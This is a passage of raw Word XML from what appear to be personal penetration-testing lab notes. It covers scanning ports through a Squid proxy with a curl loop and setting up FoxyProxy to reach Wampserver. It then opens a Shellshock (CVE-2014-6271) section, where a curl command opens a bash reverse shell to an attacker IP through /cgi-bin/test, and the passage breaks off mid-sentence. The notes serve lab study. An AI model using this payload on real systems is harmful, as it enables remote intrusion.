    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Loop over ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for port in "${ports[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Make a request using curl with the proxy, and save the response and status code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    response=$(curl -s -o /dev/null -w "%{http_code}" --proxy $proxy_address:$proxy_port $target_ip:$port)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Check if the status code is 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    if [ "$response" -eq 200 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "Response from $target_ip:$port with status code $response"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running it we get the same result, but I ran it against the same ports so that's not a surprise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="762000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="380" name="image369.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image369.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1054"/>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2FD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD2">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Okay great! From here we can use our own beloved</w:t>
      </w:r>
      <w:hyperlink r:id="rId1055">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1056">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">FoxyPoxy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reach the desired web offering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">through</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Squid Proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To add it to FoxyProxy, select Options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2337242" cy="3005026"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="125" name="image118.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image118.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1057"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2337242" cy="3005026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the Proxies Tab and press the Add button.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4157663" cy="553022"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="230" name="image224.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image224.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1058"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4157663" cy="553022"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill in Title, Type, Hostname (IP address), Port, and then Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4996020" cy="1445233"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73" name="image65.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image65.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1059"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4996020" cy="1445233"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can select it from the available proxies like you would Burp Suite and navigate to the discovered open port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDA">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can select it from the available proxies like you would Burp Suite and navigate to the discovered open port 8080, where we see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wampserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2298700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="568" name="image547.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image547.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106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2FDC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At the bottom we see some goodies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="217" name="image215.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image215.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1061"/>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2FDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack vector ended up being </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpmyadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F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E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mecplbj2x5q6" w:id="424"/>
      <w:bookmarkEnd w:id="424"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellshock/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bashbug</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CGI-Bin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2014-6271</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote code execution vulnerability in Bash when invoked through Apache CGI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen on </w:t>
      </w:r>
      <w:hyperlink r:id="rId1062">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sumo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used Nikito and saw that it was vulnerable to ShellShock. Specifically, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was. So they ran this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1442"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H "user-agent: () { :; }; /bin/bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.45.177/443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1" \</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.234.87/cgi-bin/test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1442"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Feel free to change </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
